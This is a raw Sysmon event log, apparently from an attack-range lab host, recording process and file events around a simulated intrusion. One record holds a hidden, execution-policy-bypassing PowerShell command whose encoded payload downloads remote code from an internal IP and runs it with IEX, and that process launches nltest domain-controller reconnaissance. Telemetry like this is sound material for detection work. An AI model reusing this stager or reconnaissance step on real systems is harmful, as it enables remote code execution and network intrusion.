18:15:27.787{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085348Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:27.787{B81B27B7-4130-611D-9D00-00000000C801}31603656C:\Windows\system32\csrss.exe{B81B27B7-4F3F-613A-5F90-03000000C801}3800C:\Windows\system32\nltest.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035085347Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:27.787{B81B27B7-4822-613A-788F-03000000C801}69404828C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{B81B27B7-4F3F-613A-5F90-03000000C801}3800C:\Windows\system32\nltest.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\92b818b675d92827ce6f9fe02da8f648\System.ni.dll+384236|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\92b818b675d92827ce6f9fe02da8f648\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\92b818b675d92827ce6f9fe02da8f648\System.ni.dll+2c4179|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c5b28184(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f9b47d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f9b0b8(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c5a73546(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f5802a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4fbba9c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f9daab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f9daab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f9d93c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f8e65c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4ff3f93(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c5cf89b6(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4fb14e4(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4ff335e(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c503aabb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P521220ea#\b1bafa4e567963a567180237d9e816e6\Microsoft.PowerShell.Commands.Utility.ni.dll+ffff66c0(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4fbf41e(wow64) 154100x800000000000000035085346Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:27.797{B81B27B7-4F3F-613A-5F90-03000000C801}3800C:\Windows\System32\nltest.exe10.0.14393.4283 (rs1_release.210303-1802)Microsoft® Logon Server Test UtilityMicrosoft® Windows® Operating SystemMicrosoft Corporationnltestrk.exe"C:\Windows\system32\nltest.exe" /dsgetdc:C:\Users\reed_schmidt\ATTACKRANGE\REED_SCHMIDT{B81B27B7-4132-611D-4F05-090000000000}0x9054f2MediumMD5=1171BC1F016201B83E30634121BA2A40,SHA256=8DB95007AC3DD96C487C0CC477BD89A6282D6F0949EBCECBBDA4F8D37C2A959C,IMPHASH=4C049D80BB0FE7E8B0688666FFF88442{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -exec bypass -Noninteractive -windowstyle hidden -e WwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgBTAGUAcgB2AGUAcgBDAGUAcgB0AGkAZgBpAGMAYQB0AGUAVgBhAGwAaQBkAGEAdABpAG8AbgBDAGEAbABsAGIAYQBjAGsAIAA9ACAAewAkAHQAcgB1AGUAfQA7ACQATQBTAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAHMAeQBzAHQAZQBtAC4AbgBlAHQALgB3AGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AMQAwAC4AMAAuADEALgAxADYALwBiAGgALwBzAHkAbgBjAC8AYQBvAGwALwBfAHIAcAAnACkAKQApADsASQBFAFgAIAAkAE0AUwA= 23542300x800000000000000035085345Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:27.534{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=89B90F06EE7933221F91DD06BF07D24B,SHA256=D8ECA94595D7595C3FB2AB601101803ED6C3E786A57F0D6EB7A8816D26770114,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035085374Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:28.803{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-4F40-613A-6190-03000000C801}2628C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000035085373Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:28.803{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=388D62163830976628E443B4D31EAB32,SHA256=4532C9ED63A0B1709FF2A4B382B1C438A21B0EF821C8F73E19E929B9F5532C88,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085372Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:28.803{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=0EF1D6A8C1C69FB4DDD5E62C747D94C6,SHA256=16FFC291A0CF1C55DADDBB6870EF94F0E59364AACB6ABA1479BCC21E96F70EDC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085371Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:28.803{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5D7C73A63035778BC9C6ADF6D2E8EF6C,SHA256=9CF82C9D92D6EBE527D251DF191299220859B9C77CA6955D1DFB9CCFB4D2F93C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035085370Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:28.803{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-4F40-613A-6190-03000000C801}2628C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035085369Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:28.803{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085368Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:28.803{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085367Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:28.803{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085366Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:28.803{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085365Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:28.803{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-4F40-613A-6190-03000000C801}2628C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035085364Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:28.789{B81B27B7-4F40-613A-6190-03000000C801}2628C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035085363Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:28.556{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C70235AEBFA95D830489038427D5D3CE,SHA256=DC2FD002A012F361948E8D92CC629652BB3D6997D648CCE93C4CCD4823F16656,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035085362Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:28.433{B81B27B7-4F40-613A-6090-03000000C801}38761044C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085361Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:28.255{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-4F40-613A-6090-03000000C801}3876C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085360Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:28.255{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085359Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:28.255{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085358Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:28.255{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085357Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:28.255{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085356Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:28.255{B81B27B7-4012-611D-0500-00000000C801}420536C:\Windows\system32\csrss.exe{B81B27B7-4F40-613A-6090-03000000C801}3876C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035085355Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:28.255{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-4F40-613A-6090-03000000C801}3876C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035085354Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:28.251{B81B27B7-4F40-613A-6090-03000000C801}3876C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035085377Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:29.970{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=388D62163830976628E443B4D31EAB32,SHA256=4532C9ED63A0B1709FF2A4B382B1C438A21B0EF821C8F73E19E929B9F5532C88,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085376Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:29.570{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=015E630119C8688B52A07D8E2E5497E0,SHA256=61A0F93BD0F52C5DC332BEA13F4324FAAB9DCC07A49E1DAE976FF373D643CCC7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035085375Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 